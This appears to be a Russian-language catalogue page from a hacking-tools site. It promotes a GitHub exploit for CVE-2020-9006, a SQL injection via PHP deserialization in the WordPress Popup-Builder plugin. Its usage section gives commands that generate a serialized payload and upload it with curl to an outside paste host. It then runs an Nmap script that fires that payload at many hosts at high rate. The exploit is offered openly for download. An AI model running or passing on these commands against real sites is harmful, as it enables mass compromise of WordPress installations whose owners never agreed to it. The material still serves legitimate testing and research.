Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2020-9006 — Эксплойт для CVE-2020-9006, нацеленный на плагин WordPress Popup-Builder через SQL-инъекцию и десериализацию PHP, с генерацией полезной нагрузки и интеграцией с Nmap для автоматизированного сканирования. | Kitploit
Инструменты/GitHubGitHub/s3rgeym/cve-2020-9006
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubs3rgeym/cve-2020-9006

cve-2020-9006

Эксплойт для CVE-2020-9006, нацеленный на плагин WordPress Popup-Builder через SQL-инъекцию и десериализацию PHP, с генерацией полезной нагрузки и интеграцией с Nmap для автоматизированного сканирования.

Репозиторий
14 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2020-9006: Эксплойт для плагина Popup-Builder (WordPress)

Использование:

root@kitploit:~
# Create and upload payload
# Also see: php create-serialized-payload.php -h
$ php create-serialized-payload.php | curl -F 'sprunge=<-' http://sprunge.us
http://sprunge.us/XXXXXX

# Run exploit
$ nmap --script ./cve-2020-9006 --script-args http.useragent='Mozilla/5.0',payload-url='http://sprunge.us/XXXXXX
' --min-parallelism 64 --min-rate 1000 --max-retries 1 -p 80,443 -oX report.xml -d ...hosts

Ссылки

  • CVE-2020-9006 – SQL-инъекция в WP-плагине popup-builder через десериализацию PHP
Скачать инструмент